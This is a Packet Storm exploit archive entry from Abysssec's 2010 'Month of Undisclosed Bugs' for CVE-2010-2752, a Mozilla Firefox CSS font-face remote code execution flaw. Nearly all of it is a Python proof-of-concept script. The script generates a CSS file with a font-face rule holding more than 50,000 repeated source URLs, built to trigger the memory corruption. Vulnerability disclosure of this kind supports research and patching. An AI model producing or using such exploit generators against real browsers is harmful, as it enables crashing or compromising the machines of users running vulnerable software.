Month Of Abysssec Undisclosed Bugs - Mozilla Firefox CSS Font-Face

2010-09-25T00:00:00
ID PACKETSTORM:94241
Type packetstorm
Reporter Abysssec
Modified 2010-09-25T00:00:00

Description

                                        
                                            `'''  
__ __ ____ _ _ ____   
| \/ |/ __ \ /\ | | | | _ \  
| \ / | | | | / \ | | | | |_) |  
| |\/| | | | |/ /\ \| | | | _ <  
| | | | |__| / ____ \ |__| | |_) |  
|_| |_|\____/_/ \_\____/|____/  
  
http://www.exploit-db.com/moabu-15-mozilla-firefox-css-font-face-remote-code-execution-vulnerability/  
http://www.exploit-db.com/sploits/moaub-25-exploit.zip  
  
'''  
  
'''  
Title : Mozilla Firefox CSS font-face Remote Code Execution Vulnerability  
Version : Firefox  
Analysis : http://www.abysssec.com  
Vendor : http://www.mozilla.com  
Impact : Crirical  
Contact : shahin [at] abysssec.com , info [at] abysssec.com  
Twitter : @abysssec  
CVE : CVE-2010-2752  
  
'''  
  
import sys;  
  
myStyle = """  
@font-face {  
font-family: Sean;  
font-style: normal;  
font-weight: normal;  
src: url(SEAN1.eot);  
src: url('type/filename.woff') format('woff')  
  
"""  
i=0  
while(i<50000):  
myStyle = myStyle + ",url('type/filename.otf') format('opentype')\n";  
i=i+1  
  
myStyle = myStyle + ",url('type/filename.otf') format('opentype');\n";  
myStyle = myStyle + "}\n";  
cssFile = open("style2.css","w")  
cssFile.write(myStyle)  
cssFile.close()  
  
`